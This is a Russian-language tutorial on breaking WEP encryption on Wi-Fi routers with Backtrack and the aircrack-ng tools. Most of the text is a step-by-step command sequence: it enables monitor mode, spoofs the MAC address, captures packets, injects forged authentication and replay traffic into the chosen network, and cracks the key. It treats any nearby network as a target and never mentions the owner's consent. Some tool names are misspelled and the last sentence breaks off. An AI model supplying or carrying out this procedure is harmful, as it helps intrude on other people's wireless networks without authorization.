В данной статье будет объяснено каким образом можно взломать 64bit и 128bit WEP шифрование на различных WIFI роутерах используя Backtrack, live-дистрибутив Linux. Я выполнял описанные действия на ноутбуках IBM Thinkpad x60, Acer 5672 и WIFI чипсет в этих машинах работал отлично.
Требования:
* Backtrack 3 на CD или USB
* Компьютер с поддерживаемой беспроводной картой 802.11
* Wireless Access point или WIFI роутер, использующий WEP шифрование
Подготавливаем WIFI карту
Для начала мы должны перевести карту в режим "Monitor Mode". Если вы используете чипчет IntelR PRO/Wireless 3945ABG выполните следующую команду:
modprobe -r iwl3945 modprobe ipwraw
Далее мы должны остановить нашу WIFI карту:
iwconfig
Посмотрим под каким именем виден ваш беспроводной интерфейс, далее остановим его командой:
airmon-ng stop [device]
Затем:
ifconfig down [interface]
Изменяем MAC адрес устройства:
macchanger --mac 00:11:22:33:44:66 [device]
Запускаем карту:
airmon-ng start [device]
Начинаем атаку
Теперь пришло время найти подходящую сеть для атаки. Запускаем команду:
airodump-ng [device]
Здесь мы видим доступные сети, в частности MAC адрес (BSSID), канал (CH) и имя (ESSID). Теперь начнем собирать данные с WIFI роутера для атаки:
airodump-ng -c [channel] -w [network.out] -bssid [bssid] [device]
Команда выше поместит полученные данные в файл network.out. Этот файл потребуется нам позднее когда мы будем готовы взламывать WEP ключ.
Откройте другое окно шелла и оставьте предыдущую команду выполняться. Теперь же мы сгенерируем несколько поддельных пакетов к роутеру для ускорения сбора данных. Используйте следующую команду:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
Если команда выше прошла успешно, мы будем генерировать большое количество пакетов на взламываемую сеть. Введите:
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
Это заставит точку доступа послать большое количество пакетов, которые мы сможем использовать для взлома WEP ключа. Проверьте ваш оставленный в первом окне шелла aerodump-ng. Вы должны увидеть там поле "data", в котором уже довольно много пакетов.
Когда значение этого поля достигает 10,000-20,000 вы можете начинать взлом ключа. Если нет других доступных сетей, можно попробовать команду:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]
Когда мы наберем достаточно пакетов, начинаем взлом:
aircrack-ng -n 128 -b [bssid] [filename]-01.cap
Параметр "-n 128? указывает на 128-битный WEP ключ. Если взлом не получится, используйте "-n 64?
Все, наш взлом завершился! Ключ найден и нам осталось только удалить из вывода символы :